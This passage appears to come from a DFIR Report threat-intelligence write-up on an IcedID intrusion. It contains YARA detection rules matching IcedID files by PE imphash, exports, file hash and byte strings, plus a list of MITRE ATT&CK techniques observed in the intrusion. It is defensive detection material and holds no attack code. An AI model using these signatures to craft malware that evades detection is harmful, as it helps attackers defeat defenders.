$s5 = "A;Zts}H" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and
( pe.imphash() == "67a065c05a359d287f1fed9e91f823d5" and ( pe.exports("PstmStr") and pe.exports("update") ) or all of them )
}

rule icedid_032021_2 {
meta:
description = "1 - file license.dat"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-03-21"
hash1 = "45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865"
strings:
$s1 = "+ M:{`n-" fullword ascii
$s2 = "kwzzdd" fullword ascii
$s3 = "w5O- >z" fullword ascii
$s4 = "RRlK8n@~" fullword ascii
$s5 = "aQXDUkBC" fullword ascii
$s6 = "}i.ZSj*" fullword ascii
$s7 = "kLeSM?" fullword ascii
$s8 = "qmnIqD\")P" fullword ascii
$s9 = "aFAeU!," fullword ascii
$s10 = "Qjrf\"Q" fullword ascii
$s11 = "PTpc,!P#" fullword ascii
$s12 = "r@|JZOkfmT2" fullword ascii
$s13 = "aPvBO,4" fullword ascii
$s14 = ">fdFhl^S8Z" fullword ascii
$s15 = "[syBE0\\" fullword ascii
$s16 = "`YFOr.JH" fullword ascii
$s17 = "C6ZVVF j7}" fullword ascii
$s18 = "LPlagce" fullword ascii
$s19 = "NLeF_-e`" fullword ascii
$s20 = "HRRF|}O" fullword ascii
condition:
uint16(0) == 0x43da and filesize < 1000KB and
8 of them
}

MITRE

Spearphishing Attachment - T1566.001
User Execution - T1204
Windows Management Instrumentation - T1047
Process Injection - T1055
Domain Trust Discovery - T1482
Domain Account - T1087.002
System Information Discovery - T1082
System Network Configuration Discovery - T1016
Security Software Discovery - T1518.001
SMB/Windows Admin Shares - T1021.002
Remote Desktop Protocol - T1021.001
Commonly Used Port - T1043
Application Layer Protocol - T1071
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002
Data Encrypted for Impact - T1486
Malicious File - T1204.002
Command and Scripting Interpreter - T1059
PowerShell - T1059.001
Scheduled Task - T1053.005
Remote System Discovery - T1018
Rundll32 - T1218.011